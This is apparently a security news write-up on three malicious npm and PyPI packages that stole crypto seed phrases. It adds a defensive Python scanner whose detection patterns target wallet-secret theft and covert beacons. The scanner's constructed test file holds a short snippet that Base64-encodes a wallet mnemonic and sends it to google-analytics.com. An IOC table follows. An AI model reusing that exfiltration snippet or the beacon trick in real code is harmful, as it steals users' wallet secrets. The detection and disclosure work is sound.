The Socket Threat Research Team has discovered three malicious open-source packages—two on PyPI and one on npm—designed to steal sensitive cryptocurrency data like mnemonic seed phrases and private keys.
These packages were disguised as developer tools and released between 2021 and 2024. Despite their malicious intent, they were downloaded thousands of times, showing a dangerous rise in supply chain attacks in open-source ecosystems.
Crypto Theft Hidden in Developer Tools
- The npm package react-native-scrollpageviewtest, which posed as a page-scrolling helper, was downloaded 1,215 times. Once installed, it accessed wallet engines, stole sensitive data, Base64-encoded it, and exfiltrated it to a control server through Google Analytics requests so the traffic would not draw suspicion.
- On PyPI, two similar packages, web3x and herewalletbot, used different tactics:
  - web3x posed as an Ethereum wallet checker and had over 3,400 downloads. It tricked users into entering their seed phrases and sent them to a Telegram bot.
  - herewalletbot, with 3,425 downloads, guided users through a Telegram chat while quietly collecting their mnemonic phrases.
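As an added example (not Socket's tooling and not code from the packages above), a small static check in Python that flags a package's source files when wallet-related keywords co-occur with Base64 encoding and a beacon to an analytics or Telegram bot endpoint, the combination described above. The indicator patterns and the sample package files are constructed assumptions, not real detection rules or real package contents.

```python
from __future__ import annotations
import re
from dataclasses import dataclass, field

# Hypothetical indicator patterns (assumptions): each alone is common in honest code; the co-occurrence is what a reviewer flags.
INDICATORS = {
    "wallet_access": re.compile(r"mnemonic|seed[_ ]?phrase|private[_ ]?key|secretKey", re.I),
    "base64_encode": re.compile(r"toString\(\s*['\"]base64['\"]\s*\)|\bbtoa\(|b64encode\(", re.I),
    "covert_beacon": re.compile(r"google-analytics\.com|api\.telegram\.org/bot", re.I),
    "network_call": re.compile(r"\bfetch\(|XMLHttpRequest|requests\.(get|post)\(|urlopen\(", re.I),
}

@dataclass
class Finding:
    path: str
    categories: list[str] = field(default_factory=list)
    first_line: dict[str, int] = field(default_factory=dict)  # category -> first matching line number
    @property
    def risk(self) -> str:
        cats = set(self.categories)
        if "wallet_access" not in cats:
            return "low"
        # Key material next to a beacon endpoint, or next to encoding plus any network call, is the pattern to escalate.
        if "covert_beacon" in cats or {"base64_encode", "network_call"} <= cats:
            return "high"
        return "medium" if "network_call" in cats else "low"

def scan_package(files: dict[str, str]) -> list[Finding]:
    """Scan each file line by line; return one Finding per file that matches any indicator."""
    findings = []
    for path, text in files.items():
        finding = Finding(path)
        for lineno, line in enumerate(text.splitlines(), start=1):
            for category, pattern in INDICATORS.items():
                if pattern.search(line) and category not in finding.first_line:
                    finding.categories.append(category)
                    finding.first_line[category] = lineno
        if finding.categories:
            findings.append(finding)
    return findings

def risk_report(files: dict[str, str]) -> dict[str, str]:
    """Map each flagged path to its risk level, for a dependency review checklist."""
    return {f.path: f.risk for f in scan_package(files)}

# Constructed sample package contents (not the real packages' code): one benign helper, one suspicious beacon, one honest key utility.
CONSTRUCTED_FILES = {
    "src/ScrollPager.js": "export const pageIndex = (e) => Math.round(e.nativeEvent.contentOffset.x / 360);\n",
    "src/telemetry.js": "const secret = wallet.mnemonic;\n"
                        "const blob = Buffer.from(secret).toString('base64');\n"
                        "fetch('https://www.google-analytics.com/collect?ea=' + blob);\n",
    "wallet/keys.py": "def derive_private_key(mnemonic: str) -> bytes:\n    return sha256(mnemonic.encode()).digest()\n",
}
```

Run `risk_report(CONSTRUCTED_FILES)` to see the beacon file rated high and the honest key utility rated low; the scroll helper produces no finding at all.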
These threats show how attackers are embedding malware into developer tools, taking advantage of the trust placed in open-source packages. The presence of these malicious packages for years highlights the need for better security in the software supply chain.
Developers and teams should:
- Review source code before using packages
- Monitor app behavior at runtime
- Analyze dependencies for hidden threats
Never share your seed phrase or private keys, and always treat any request for them as suspicious. If you come across such a package, report it immediately.
Indicators of Compromise (IOCs)
| Malicious Package | Alias | Downloads | Email/Endpoint |
|---|---|---|---|
| react-native-scrollpageviewtest | twoplus | 1,215 | twoplusten@163[.]com |
| web3x | tonymevbots | 3,405 | xeallmail@mitico[.]org |
| herewalletbot | vannszs | 3,425 | bevansatria@gmail[.]com, @herewalletbot, hxxps://web[.]telegram[.]org/k/#@herewalletbot |